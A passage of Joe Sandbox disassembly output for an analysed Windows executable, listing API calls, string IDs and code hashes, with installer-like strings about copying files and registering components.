                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: :2JA
                                                                                                                                              • API String ID: 621844428-2456821934
                                                                                                                                              • Opcode ID: bed7321c9c204cb8cd5722dbf95b8552fc08eb8f92b1cdc900ef367eba19e80c
                                                                                                                                              • Instruction ID: bd6ca9975592287ff3bf37448675c7f8dd8f71a80a3a7f452102db1ec2ca80e7
                                                                                                                                              • Opcode Fuzzy Hash: bed7321c9c204cb8cd5722dbf95b8552fc08eb8f92b1cdc900ef367eba19e80c
                                                                                                                                              • Instruction Fuzzy Hash: 60118172D082588BE754CA54D8C0BEABBB5EB44314F1081FBD90D67241C7385DC2CE92
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 2a4428f964055bc27906bf0b3943d152fe9f7d2cc4aea13bb19980674960d63b
                                                                                                                                              • Instruction ID: 878a7a517feadf35be4a811c99a4a107fe3071d467d10ec570d7f39041e71d9c
                                                                                                                                              • Opcode Fuzzy Hash: 2a4428f964055bc27906bf0b3943d152fe9f7d2cc4aea13bb19980674960d63b
                                                                                                                                              • Instruction Fuzzy Hash: 62110CB19041189EF7608A65DE44BFB75BAEBD0301F10C17FE449B15C4EB3D0ED68522
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 06ee5b3d2fc16acf124b33efc9de37e96a397455a9b7036738e288a6d516d034
                                                                                                                                              • Instruction ID: 91f151be12e34eefcece0535555c551b6786545de7eb143ac315b72f635cada5
                                                                                                                                              • Opcode Fuzzy Hash: 06ee5b3d2fc16acf124b33efc9de37e96a397455a9b7036738e288a6d516d034
                                                                                                                                              • Instruction Fuzzy Hash: BF11E5B2E041188EF7604A64DE44BFA75BAEBE0301F20817FE44AB15C4EB3D0ED68522
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: b83d9dad2a6c158be96d1e69bc9c1a3b76d9e51e126cb3a63bde19017aee412c
                                                                                                                                              • Instruction ID: 9756af19a8da1055843f120654c456da4387201b88b3d00ca56c5845746b4395
                                                                                                                                              • Opcode Fuzzy Hash: b83d9dad2a6c158be96d1e69bc9c1a3b76d9e51e126cb3a63bde19017aee412c
                                                                                                                                              • Instruction Fuzzy Hash: F61106B19001148EF7608A25DE44BBB767AEBD0310F20C2BBD84DB15C4DB3C0FD68922
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 6d4f8bbf9da01e63885aab117a6982c7bd010285d059c4942f9c7a8494af099a
                                                                                                                                              • Instruction ID: 377b1287552c4201c3694d176e94097adba3da47ac4a77b2be544285f1439102
                                                                                                                                              • Opcode Fuzzy Hash: 6d4f8bbf9da01e63885aab117a6982c7bd010285d059c4942f9c7a8494af099a
                                                                                                                                              • Instruction Fuzzy Hash: 1C01D6F18042548FF7508A34DD447AB3B79EBC0314F2482BED40EA66C5C77D499ACE62
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: O9F_
                                                                                                                                              • API String ID: 621844428-2491346318
                                                                                                                                              • Opcode ID: 264cb0e2c088fb19869ac2c3948f2b91678a05936a8a1657452cec09c6e38fe6
                                                                                                                                              • Instruction ID: e2960921275b2b4cd9612f950d1ae373fda1593bcce3403b59f8bcfc46ae8f1c
                                                                                                                                              • Opcode Fuzzy Hash: 264cb0e2c088fb19869ac2c3948f2b91678a05936a8a1657452cec09c6e38fe6
                                                                                                                                              • Instruction Fuzzy Hash: 6FF0A9F2D042245BE7548600DC99EDF7638FB90724F2540B9D84D36380E6791FC1CA91
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 2e4171a9dd523c1b565d793313d8689d3f46eb01583badc22c57eb070c073207
                                                                                                                                              • Instruction ID: 50075f126f50ca42df1adf15c636a1e18d7bccec036e41fb6c55c8ee5c780747
                                                                                                                                              • Opcode Fuzzy Hash: 2e4171a9dd523c1b565d793313d8689d3f46eb01583badc22c57eb070c073207
                                                                                                                                              • Instruction Fuzzy Hash: 60F0BBB19041544EF7504924DD48BAB3A76DBC0314F24C1BBD40DA59C9DB7D46DA8952
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 1952a7936c0133cbfde560b3d65e68ecd23dbfe18d21b3882dfbd8e159183bd1
                                                                                                                                              • Instruction ID: 28a30fba0cf0ee09651f58da81d84667316d1d37065a446d687b3b9cc59c00c5
                                                                                                                                              • Opcode Fuzzy Hash: 1952a7936c0133cbfde560b3d65e68ecd23dbfe18d21b3882dfbd8e159183bd1
                                                                                                                                              • Instruction Fuzzy Hash: D041E4B2D086189FF7248A24DC45BAB7766EB80304F1481BBD50E666C2D63D5EC6CE16
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: f05c7cdd0c2a89594f47dbef6b61db932463086430597c7660979c7c10a5ab6b
                                                                                                                                              • Instruction ID: 882d15620eb7eecb2d0aa9dcd3cf1b034f2550b2a661cbfbfd18463f6c30bfe7
                                                                                                                                              • Opcode Fuzzy Hash: f05c7cdd0c2a89594f47dbef6b61db932463086430597c7660979c7c10a5ab6b
                                                                                                                                              • Instruction Fuzzy Hash: 6821D5B1D046189FEB218A34DC84BAB7778EB85314F1481BED50E66682D63C2E85CE16
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 393a5a6df8ca1fca4ab286b25fa4b899f39e5161d627bd1ae29fc664769e89ef
                                                                                                                                              • Instruction ID: bc008174fa5c8c00d50f4e6e7ef79aefa11b1a91fc4689ab148c9eb7b5df80ae
                                                                                                                                              • Opcode Fuzzy Hash: 393a5a6df8ca1fca4ab286b25fa4b899f39e5161d627bd1ae29fc664769e89ef
                                                                                                                                              • Instruction Fuzzy Hash: 6E21F8B1D042148BF7248A24CC447AA7779EBC0304F1081BBD50E662C1DB3C1EC6CE15
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 525f65e3acfe61d12f741faf333643b6ebc8d08f10b8804c8dbaaa0e556cf66a
                                                                                                                                              • Instruction ID: 8961e96e427b683b31720350abae294adda1e344f94fc1859dcd5a9fe708f2bd
                                                                                                                                              • Opcode Fuzzy Hash: 525f65e3acfe61d12f741faf333643b6ebc8d08f10b8804c8dbaaa0e556cf66a
                                                                                                                                              • Instruction Fuzzy Hash: C521C2B2D046185FF7208624DC94BEBB729EBC0305F1481FBDA0E667C6E67C1EC68A55
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: c63f49b21d21d95bc40723c1b3f9dbf396e549ee8db6eec482638b35abd01bca
                                                                                                                                              • Instruction ID: a8b9d21c14bd6756ea2083d86b1de241c76d10397dc48dfeef546d6de03f78dc
                                                                                                                                              • Opcode Fuzzy Hash: c63f49b21d21d95bc40723c1b3f9dbf396e549ee8db6eec482638b35abd01bca
                                                                                                                                              • Instruction Fuzzy Hash: D91104B2D081185EF7204A28DC84BBB7769EBC1304F1481BBE60A622C5DB7C1EC68A19
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 739c5a1c5665e492e231414889154891bcca33481d719829c1e0a59415f1db45
                                                                                                                                              • Instruction ID: 2efe610efef26c316ff5e4394a3bb24518ef482f11a2c2a78c263a8780145305
                                                                                                                                              • Opcode Fuzzy Hash: 739c5a1c5665e492e231414889154891bcca33481d719829c1e0a59415f1db45
                                                                                                                                              • Instruction Fuzzy Hash: 2E01A5B1D046149AE7248A24DC84BAA7775FBC4704F1481BAD60A62285D73C1EC6CE1A
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 8692825e9919de68594ad9101b10b57b1761991d3f4a09e1ce6eb6bf2d033d77
                                                                                                                                              • Instruction ID: b4fcd2e97898c1d1e95cdfb52856e909c698e5e970dab9d8733a941e216dfe61
                                                                                                                                              • Opcode Fuzzy Hash: 8692825e9919de68594ad9101b10b57b1761991d3f4a09e1ce6eb6bf2d033d77
                                                                                                                                              • Instruction Fuzzy Hash: 620161B2D046149AF7258A24DC84BAAB779F7C4705F1481BBD60E623C1D77C1AC68A16
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 623bc1917886294fa3a3973daee9a4ce079e56149a84b3407f9cc2be0ab89ea1
                                                                                                                                              • Instruction ID: 14454bd848f105198fd31c1056009a0a3624a6990289aef0bf5afecc7fb4dad4
                                                                                                                                              • Opcode Fuzzy Hash: 623bc1917886294fa3a3973daee9a4ce079e56149a84b3407f9cc2be0ab89ea1
                                                                                                                                              • Instruction Fuzzy Hash: 85F0C8F1D086186BE7244A24DC84BEBB775FB85705F1440FFD20E62681E7382AC5CE05
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: d8f5f7b99447ee2ae1927c43cf2d1809b16e407b5f11c99ce8941ce0b50a2731
                                                                                                                                              • Instruction ID: 48cb507a7489ce748ca95b43230919b9bdd4d938de463dfe560f4786e58ad683
                                                                                                                                              • Opcode Fuzzy Hash: d8f5f7b99447ee2ae1927c43cf2d1809b16e407b5f11c99ce8941ce0b50a2731
                                                                                                                                              • Instruction Fuzzy Hash: 76D02BF2E0850412F3A40210EC55BA97A14D744B01F2A00BDD20F513C0CBBC22C08006
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 821cd59cc18272ed3796e4f433aba563b08464d2ee76fcfaa3ea73945a435167
                                                                                                                                              • Instruction ID: 5119dceeff3587c28e3e0ce5d62307b050b56dee6c2e1fbfad8641ab02c6c180
                                                                                                                                              • Opcode Fuzzy Hash: 821cd59cc18272ed3796e4f433aba563b08464d2ee76fcfaa3ea73945a435167
                                                                                                                                              • Instruction Fuzzy Hash: B7D012F0C483159BEBE88B00DC457A97239EB40710F2041FAD50E66390DB341EC5CE57
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 167854a99600fa0e99dd71a3bcf69e92131ec6f4da5e2abf3ce424393fbf3d87
                                                                                                                                              • Instruction ID: 49a8e1bd9c86ad356a55df1ae2979953c7749a54d733bd57f9585beca62ad5fb
                                                                                                                                              • Opcode Fuzzy Hash: 167854a99600fa0e99dd71a3bcf69e92131ec6f4da5e2abf3ce424393fbf3d87
                                                                                                                                              • Instruction Fuzzy Hash: BAD017B08083149BEBE88B00CC85BA9B339AB44710F2041EDA20E22690DB742EC4CF16
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: f8c83ce0659933d12c25224a73ff6f80cd7f86ca7789c9273cdc97401311b0bd
                                                                                                                                              • Instruction ID: a6e3e7d99a38821e76979d747b758569e49a17766073ac88e5f09d68a5376ae8
                                                                                                                                              • Opcode Fuzzy Hash: f8c83ce0659933d12c25224a73ff6f80cd7f86ca7789c9273cdc97401311b0bd
                                                                                                                                              • Instruction Fuzzy Hash: 95D0C934E487688BCBE4DB00C8857E8B739EB95712F2082E6909E66260DF701EC6CF01
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 1dc31577b986d824ade95fff7c23ca0874cd8e7894de531ceb1573817e2cca04
                                                                                                                                              • Instruction ID: 713af2a74f578950d3ef6b9bcb030b6e7d225ccb29fc3f0653117ab54aca20c7
                                                                                                                                              • Opcode Fuzzy Hash: 1dc31577b986d824ade95fff7c23ca0874cd8e7894de531ceb1573817e2cca04
                                                                                                                                              • Instruction Fuzzy Hash: 38D0E974D083298BDBE89B00D8957D8B735AB44711F1440E9D54E66390DF701EC4CF06
                                                                                                                                              APIs
                                                                                                                                              • ImpersonateSelf.ADVAPI32(00000002,?,?), ref: 00413967
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00413974
                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?), ref: 0041397B
                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00413985
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 0041399C
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?), ref: 004139A3
                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004139C8
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000014,?,?), ref: 004139DA
                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,?), ref: 004139F0
                                                                                                                                              • GetLengthSid.ADVAPI32(?,?,?), ref: 00413A02
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000010,?,?), ref: 00413A13
                                                                                                                                              • InitializeAcl.ADVAPI32(00000000,-00000010,00000002,?,?), ref: 00413A2A
                                                                                                                                              • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000003,?,?,?), ref: 00413A48
                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,?), ref: 00413A60
                                                                                                                                              • SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000,?,?), ref: 00413A75
                                                                                                                                              • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000,?,?), ref: 00413A82
                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(00000000,?,?), ref: 00413A89
                                                                                                                                              • AccessCheck.ADVAPI32(00000000,?,00000001,?,?,00000014,?,?,?,?), ref: 00413AC8
                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 00413AD2
                                                                                                                                              Strings
                                                                                                                                              • AccessCheck() failed with error %lu, xrefs: 00413AD9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DescriptorSecurity$Initialize$AccessAllocCurrentErrorLastLocalOpenProcessThreadToken$AllocateAllowedCheckDaclGroupImpersonateLengthOwnerSelfValid
                                                                                                                                              • String ID: AccessCheck() failed with error %lu
                                                                                                                                              • API String ID: 1643233394-3122912231
                                                                                                                                              • Opcode ID: 15af52b6dc6585a8aaa5b1198cb4af8417f1577e0f23ce853e5bded0e1c0e001
                                                                                                                                              • Instruction ID: 6636ee4da2cd74bfd359609ec80115f8e5afcf80bc05880448599f8d891f14b3
                                                                                                                                              • Opcode Fuzzy Hash: 15af52b6dc6585a8aaa5b1198cb4af8417f1577e0f23ce853e5bded0e1c0e001
                                                                                                                                              • Instruction Fuzzy Hash: 4D515E75A00208ABEB10DFE5DC89FEFBBB8AF46741F044029F605A6280D7B949458B66
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00409FA9
                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0040A018
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040A02A
                                                                                                                                                • Part of subcall function 00414A00: FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 00414A1D
                                                                                                                                                • Part of subcall function 00414A00: FindClose.KERNEL32(00000000), ref: 00414A39
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A047
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A056
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040A0C5
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1B8
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A1C7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirst$AttributesNext
                                                                                                                                              • String ID: %s\%s$%s\*_inst.exe$Copy %s->%s$Exit runGameSpecificExe$Looking for %s$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                                              • API String ID: 4025586506-1506763675
                                                                                                                                              • Opcode ID: e2e9ab5ccb90d6f9dd843bbe4941d007a6a10c0c1eed867c47787b405c742b8f
                                                                                                                                              • Instruction ID: d2b54da0a6a615d98c4bb7f4e3ad910886c78d04fea921c7db62d1ad87df31e2
                                                                                                                                              • Opcode Fuzzy Hash: e2e9ab5ccb90d6f9dd843bbe4941d007a6a10c0c1eed867c47787b405c742b8f
                                                                                                                                              • Instruction Fuzzy Hash: D7A1D8B2108344ABD724DF60CC45FEB73ACEB84704F44492EB98957181DB79A74DCB6A
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000), ref: 004151FB
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00415213
                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0041521E
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00415232
                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0041523A
                                                                                                                                              • CopyFileA.KERNEL32(?,?,?), ref: 0041524E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesFind$CloseCopyErrorFirstLast
                                                                                                                                              • String ID: "%s"$/s /regserver$MyCopyFile$dll$exe$exec: %s /s %s$exec: %s /s /regserver %s$ocx
                                                                                                                                              • API String ID: 3483889725-3576774900
                                                                                                                                              • Opcode ID: e506baffcbc136c6131d4a1c8671d6fc93e4fe8248ca6c74d0802763e75e9641
